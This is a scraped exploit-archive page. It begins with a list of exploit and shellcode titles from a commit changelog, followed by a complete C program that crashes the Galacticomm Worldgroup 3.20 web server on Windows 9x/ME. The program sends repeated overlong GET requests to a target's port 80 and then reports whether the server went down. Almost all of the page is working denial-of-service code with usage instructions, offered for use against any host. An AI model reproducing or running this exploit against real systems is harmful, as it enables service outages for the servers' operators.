
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
110 lines
No EOL
3.8 KiB
C
110 lines
No EOL
3.8 KiB
C
// source: https://www.securityfocus.com/bid/4186/info
|
|
|
|
Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers.
|
|
|
|
A vulnerability has been reported in the web server included with Worldgroup. If a HTTP GET request is received by the server consisting of a long string of arbitrary characters, the server will crash. A restart may be required in order to regain normal functionality.
|
|
|
|
Earlier versions of Worldgroup may share this vulnerability.
|
|
|
|
/*
|
|
by Limpid Byte project
|
|
http://lbyte.void.ru
|
|
lbyte@host.sk
|
|
|
|
Worldgroup Server Denial of Service for
|
|
Windows 9x/ME only.
|
|
Error between system fuction windows and
|
|
worldgroup from web interface.
|
|
REGUEST:
|
|
GET /signup/a.[aaaaaaaa....aaaa]
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <winsock.h>
|
|
|
|
#define FOUND "200"
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int sock, count;
|
|
struct sockaddr_in blah;
|
|
struct hostent *he;
|
|
char cgiBuff[1024];
|
|
WSADATA wsaData;
|
|
|
|
if (argc < 2)
|
|
{
|
|
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n");
|
|
printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n");
|
|
printf(" USAGE : www_dos.exe [HOST] \n");
|
|
printf(" example : www_dos.exe 127.0.0.1 \n");
|
|
exit(1);
|
|
}
|
|
|
|
if(WSAStartup(0x101,&wsaData))
|
|
{
|
|
printf("Unable to initialize WinSock lib.\n");
|
|
exit(1);
|
|
}
|
|
printf("Let's crash the World!\n");
|
|
printf("Coded by the [eaSt]:\n");
|
|
printf("\nScanning %s on port 80...\n\n", argv[1]);
|
|
|
|
for (count = 0; count < 94; count++)
|
|
{
|
|
sock = socket(AF_INET,SOCK_STREAM,0);
|
|
blah.sin_family=AF_INET;
|
|
blah.sin_addr.s_addr=inet_addr(argv[1]);
|
|
blah.sin_port=htons(80);
|
|
if ((he = gethostbyname(argv[1])) != NULL)
|
|
{
|
|
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
|
|
}
|
|
else
|
|
{
|
|
if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)
|
|
{
|
|
WSACleanup();
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)
|
|
{
|
|
WSACleanup();
|
|
exit(1);
|
|
}
|
|
|
|
memset(cgiBuff, 0, sizeof(cgiBuff));
|
|
sprintf(cgiBuff, "GET /signup/");
|
|
memset(cgiBuff + 12, 'a', 219 + count);
|
|
sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n");
|
|
printf("Sending: %d symbols request\n", strlen(cgiBuff));
|
|
|
|
send(sock,cgiBuff,strlen(cgiBuff),0);
|
|
memset(cgiBuff, 0, sizeof(cgiBuff));
|
|
if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {
|
|
printf("Crashed\n");
|
|
}
|
|
else {
|
|
cgiBuff[32] = 0;
|
|
if (strstr(cgiBuff,FOUND))
|
|
{
|
|
printf("Send (%s)\n", cgiBuff);
|
|
}
|
|
else
|
|
{
|
|
printf("Not Found (%s)\n", cgiBuff);
|
|
}
|
|
}
|
|
|
|
closesocket(sock);
|
|
}
|
|
|
|
printf("Try reconnect to %s\n", argv[1]);
|
|
WSACleanup();
|
|
return 0;
|
|
} |